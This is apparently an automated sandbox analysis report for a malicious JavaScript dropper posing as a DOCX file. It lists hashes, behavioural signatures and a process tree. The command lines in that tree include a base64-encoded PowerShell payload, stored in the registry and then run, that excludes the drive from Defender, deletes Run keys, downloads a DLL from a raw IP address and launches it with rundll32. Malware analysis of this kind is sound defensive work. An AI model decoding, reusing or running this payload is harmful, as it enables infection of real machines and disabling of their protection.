Analysis
-
max time kernel
121s -
max time network
126s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
13/03/2023, 13:56
Static task
static1
Behavioral task
behavioral1
Sample
DOCX#qMTnY(245).js
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
DOCX#qMTnY(245).js
Resource
win10v2004-20230220-en
General
-
Target
DOCX#qMTnY(245).js
-
Size
108KB
-
MD5
a2cfdb41e8533293b1dc5278fd36501e
-
SHA1
4b9bab73bacf21939ac73545c6c532c9ce656327
-
SHA256
7742093c2d008a0ea1b3eb75baed013aaf7fe2e7c40fed45b67e37a63df08afd
-
SHA512
21ca46c0fc3b9e4356921aee70b766d296a04af668d521ce1508e410b542d86bb7106044f1f96e2d7ca65b06beed931fc754aaebd031dea8265dedf40f5b2a2a
-
SSDEEP
3072:prXirXd1SWSaZGOS6jj+PLGtci8m1z1AK5/a6MZ:pr+Xd1SWSaZGkjj+jA78m1zU6MZ
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 32 60 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation wscript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry key 1 TTPs 4 IoCs
pid Process 1852 reg.exe 2964 reg.exe 1712 reg.exe 4164 reg.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 5048 powershell.exe 5048 powershell.exe 60 powershell.exe 60 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 5048 powershell.exe Token: SeDebugPrivilege 60 powershell.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 4244 wrote to memory of 1852 4244 wscript.exe 92 PID 4244 wrote to memory of 1852 4244 wscript.exe 92 PID 4244 wrote to memory of 2964 4244 wscript.exe 94 PID 4244 wrote to memory of 2964 4244 wscript.exe 94 PID 4244 wrote to memory of 1712 4244 wscript.exe 96 PID 4244 wrote to memory of 1712 4244 wscript.exe 96 PID 4244 wrote to memory of 4164 4244 wscript.exe 98 PID 4244 wrote to memory of 4164 4244 wscript.exe 98 PID 4244 wrote to memory of 5048 4244 wscript.exe 100 PID 4244 wrote to memory of 5048 4244 wscript.exe 100 PID 5048 wrote to memory of 60 5048 powershell.exe 102 PID 5048 wrote to memory of 60 5048 powershell.exe 102 PID 60 wrote to memory of 2072 60 powershell.exe 105 PID 60 wrote to memory of 2072 60 powershell.exe 105
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\DOCX#qMTnY(245).js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4244 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\QuindecimStithy /v poromata /d TVDofYVGGELwKRHNxqWlCDiiTrzlsEetsnsLzNooMJaQrsmoBBjuZzRHxebjTWvxqSkhvUucxMNiheUCAgkwhqpeZtJKFFqhywWHFiebsMjpPZVMSfVNTpswqZbbQngBUhlGgIIo2⤵
- Modifies registry key
PID:1852
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\decapodousDelayingly /v Homerite /d BlAHIAcwAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAFEAdQBpAG4AZABlAGMAaQBtAFMAdABpAHQAaAB5ACAAfAAgACUAewAkAF8ALgBIAG8AbQBlAHIAaQB0AGUAfQA7ACAAJABXAGkAdgBlAHIAcwAgAD0AIAAiAHAAcgBvAHMAbwBkAGkAYQBjAFAAaAB5AGwAbABvAHMAYwBvAHAAdQBzACIAIAArACAAJABXAGkAdgBlAHIAcwA7ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoAZgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBpAHYAZQByAHMAKQApADsAIABbAGMAbABhAHMAcwBpAGMAeQBjADEAXQA6ADoARQB4AGUAYwB1AHQAZQAoACIAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQB4AGUAYwB1AHQAaQBvAG4AcABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAiACIAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlACAAPQAgAGAAKABnAGUAdAAtAGwAbwBjAGEAdABpAG8AbgBgACkALgBEAHIAaQB2AGUALgBOAGEAbQBlACAAKwAgACcAOgBcACcAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABgACQAYwB1AHIAcgBlAG4AdABEAHIAaQB2AGUAOwByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIAAvAHYAIABVAHMAZQByAGkAbgBpAHQAIAAvAGYAOwAgAHIAZQBnACAAZABlAGwAZQB0AGUAIABIAEsARQBZAF8AQwBVAFIAUgBFAE4AVABfAFUAUwBFAFIAXABTAE8ARgBUAFcAQQBSAEUAXABRAHUAaQBuAGQAZQBjAGkAbQBTAHQAaQB0AGgAeQAgAC8AdgAgAEgAbwBtAGUAcgBpAHQAZQAgAC8AZgAiACIAIgApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwAxADkANAAuADIAMQAzAC4AMQA4AC4AMQA0ADIALwBvADMAWQBoAFgAbgAvADAAMAAwACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABQAGkAYwBrAHAAbwBjAGsAZQB0AC4AZABsAGwAOwAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABQAGkAYwBrAHAAbwBjAGsAZQB0AC4AZABsAGwALABYAEwANQA1ADsA2⤵
- Modifies registry key
PID:2964
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\decapodousDelayingly /v Unconsummative /d lmfNeTXdhvUGhcIwWxEHnFXLuCQQSdYPVTJuLvynloWALCgrLkcvHoJROpVTDGuvLengbApceWjXknhAMYtAVegVVnjsSdiZxqLIErWwXWQIAtTtvosutSgNwCottKVDlATqERuwZJrkGIBYaCLXyBojpTWlhmbGeCnNZhjPYEJYffDUFuwBXhoiWVktywJcKIYHyLGSALUZosqTXsrgNQSvDyVjytwAZIWCWUnlSJuMAvWPjUbriNIzQFWbaTdoccDnIASSvBVcfuIAElizJcaKsURTOWxKXGBiBDIlwOWYCwaPalTxcyVFyKHtVeSKAjxtemtnMuNTKCySQLaPScjAIMetUjidpNsYqFYnjoOGNKYruldwbjufyuZmGxmebHKHGAhL2⤵
- Modifies registry key
PID:1712
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\decapodousDelayingly /v materializerMonologies /d YRekQUCVQiGWXoMcwPKuSrqYgYShSVdTTlvYWASvjnVixyvFiXZNMmHRLEruppYwUTatNQSlIPxSFzOiJJKuuvXhQFWdsefFJXbXKXfIlRWenVJTJuMbNCsqmDYXtgTEJqWyMDxaqMlVXZgcKCKxwGlBCqYyYeaxxlAauaosJvaJnAysrHFIPgesadyTQDulpWWLZSzrWzdwPBNqzSPWOUbSbVbjxMhrtEuRacbJNJQjaJTEVradFTHLGHCRnkLfYuODgjiHkrWEBAOXmg2⤵
- Modifies registry key
PID:4164
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $decapodousDelayingly = Get-ItemProperty -Path HKCU:\SOFTWARE\decapodousDelayingly | %{$_.Homerite}; powershell -windowstyle Minimized -encodedcommand "JABXAGkAdg$decapodousDelayingly"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5048 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle Minimized -encodedcommand JABXAGkAdgBlAHIAcwAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAFEAdQBpAG4AZABlAGMAaQBtAFMAdABpAHQAaAB5ACAAfAAgACUAewAkAF8ALgBIAG8AbQBlAHIAaQB0AGUAfQA7ACAAJABXAGkAdgBlAHIAcwAgAD0AIAAiAHAAcgBvAHMAbwBkAGkAYQBjAFAAaAB5AGwAbABvAHMAYwBvAHAAdQBzACIAIAArACAAJABXAGkAdgBlAHIAcwA7ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoAZgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBpAHYAZQByAHMAKQApADsAIABbAGMAbABhAHMAcwBpAGMAeQBjADEAXQA6ADoARQB4AGUAYwB1AHQAZQAoACIAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQB4AGUAYwB1AHQAaQBvAG4AcABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAiACIAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlACAAPQAgAGAAKABnAGUAdAAtAGwAbwBjAGEAdABpAG8AbgBgACkALgBEAHIAaQB2AGUALgBOAGEAbQBlACAAKwAgACcAOgBcACcAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABgACQAYwB1AHIAcgBlAG4AdABEAHIAaQB2AGUAOwByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIAAvAHYAIABVAHMAZQByAGkAbgBpAHQAIAAvAGYAOwAgAHIAZQBnACAAZABlAGwAZQB0AGUAIABIAEsARQBZAF8AQwBVAFIAUgBFAE4AVABfAFUAUwBFAFIAXABTAE8ARgBUAFcAQQBSAEUAXABRAHUAaQBuAGQAZQBjAGkAbQBTAHQAaQB0AGgAeQAgAC8AdgAgAEgAbwBtAGUAcgBpAHQAZQAgAC8AZgAiACIAIgApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwAxADkANAAuADIAMQAzAC4AMQA4AC4AMQA0ADIALwBvADMAWQBoAFgAbgAvADAAMAAwACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABQAGkAYwBrAHAAbwBjAGsAZQB0AC4AZABsAGwAOwAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABQAGkAYwBrAHAAbwBjAGsAZQB0AC4AZABsAGwALABYAEwANQA1ADsA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:60 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\\Pickpocket.dll,XL554⤵PID:2072
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5223bd4ae02766ddc32e6145fd1a29301
SHA1900cfd6526d7e33fb4039a1cc2790ea049bc2c5b
SHA2561022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e
SHA512648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc
-
Filesize
64B
MD5a6c9d692ed2826ecb12c09356e69cc09
SHA1def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA5122f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82